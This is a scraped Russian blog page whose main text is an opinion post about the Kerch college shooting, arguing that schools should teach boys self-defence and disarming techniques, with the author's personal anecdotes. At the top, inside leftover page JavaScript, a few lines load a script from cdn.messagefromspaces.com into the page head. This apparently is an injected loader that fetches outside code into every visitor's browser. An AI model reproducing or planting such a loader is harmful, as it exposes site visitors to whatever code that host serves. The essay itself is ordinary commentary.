, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему в школах не обучают самообороне?

18 Окт

Прежде всего, соболезную родственникам погибших и пострадавшим.

События, в керченском колледже дали повод официальным лицам и  «экспертам» на всех телеканалах  говорить о введении новых запретов — от ужесточения правил продажи оружия до усиления госконтроля над интернетом. Некоторые говорят об охране школ «Росгвардией»,  но не хотят задаваться вопросом: «Если вахтёрша нажала тревожную кнопку, почему так долго не было милиции в колледже?»

Совсем не хотят анализировать тот факт, что  осмотр тел свидетельствует о том, что они скончались от огнестрельных ранений.  От выстрелов из дробового ружья, которое не является автоматическим, требовало не только неоднократной перезарядки, после каждого выстрела, но и полной перезарядке, после пяти выстрелов.  А это значит, что было время не только у преподавателей, но и сверстников убийцы, обезоружить его.

От поражающей силы дробового ружья можно было укрыться за столом, дверью, стулом.

Но на видео, что демонстрировали,  видно, как все в панике разбегаются, и никто даже не пытается обезоружить нападающего.

Мы гордимся достижениями мужчин  нашей армии, но защитника Отечества надо выращивать ещё до службы в армии. В школе мальчикам должны преподавать не только уроки физкультуры, но и самообороны.

Приведу свой жизненный пример.

Моими сверстниками были первые дети победителей в Великой Отечественной войне. Росли мы на улице, где, несмотря на пережитую народом войну, не всегда главенствовало добро и справедливость. Желающих унизить и обидеть всегда хватало. Поэтому нередко приходил домой с синяками. Отец заметил это и стал сам меня обучать приёмам самообороны, а затем передал своему приятелю, что служил в военной разведке.  Результат тренировок быстро почувствовали мои обидчики. Тогда некоторые из них пытались воспользоваться силой своих старших братьев или знакомых.  Среди них были и те, что носили с собой самодельные  ножи. Но я уже был обучен  приемам рукопашного боя и при нападении с ножом. Поэтому нож в руках у нападавшего у меня не вызывал панического страха. Как действовать я знал. Скорее наоборот, это придавало мне уверенности в том, что нападающий слаб и труслив.

Точно знаю, что окажись  в ситуации, что произошла в керченском колледже, я принимал бы меры по разоружению этого стрелка.

Самооборона помогла мне и при службе в армии, когда «деды» решились расправиться со мной за неисполнение их прихоти.  Подробно об этом уже  писал https://echo.msk.ru/blog/advokatvladimir/1908756-echo/  в статье: «Предан и оговорен «коллегами», унижен и забыт властью, но остался Человеком, пригодившимся своей стране — 110 лет С.П. Королёву».

Мне представляется, что любой выпускник школы, наряду с оценкой его школьных знаний, должен сдавать зачёт по самообороне. Умению защититься не только от удара рукой, но и ножом и битой. Иметь навыки по обезоруживанию вооружённого нападающего. Вот тогда ни у кого не будет желания в школе или ещё в каком-то людном месте устраивать побоище. Тогда больше будет настоящих защитников Отечества.

Жизнью не раз проверены слова Шиллера:

И нет там заступников ни у кого,

Там каждый стоит за себя самого.

Ставь жизнь свою на́ кон в игре боевой:

И жизнь сохранишь ты, и выигрыш — твой!

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.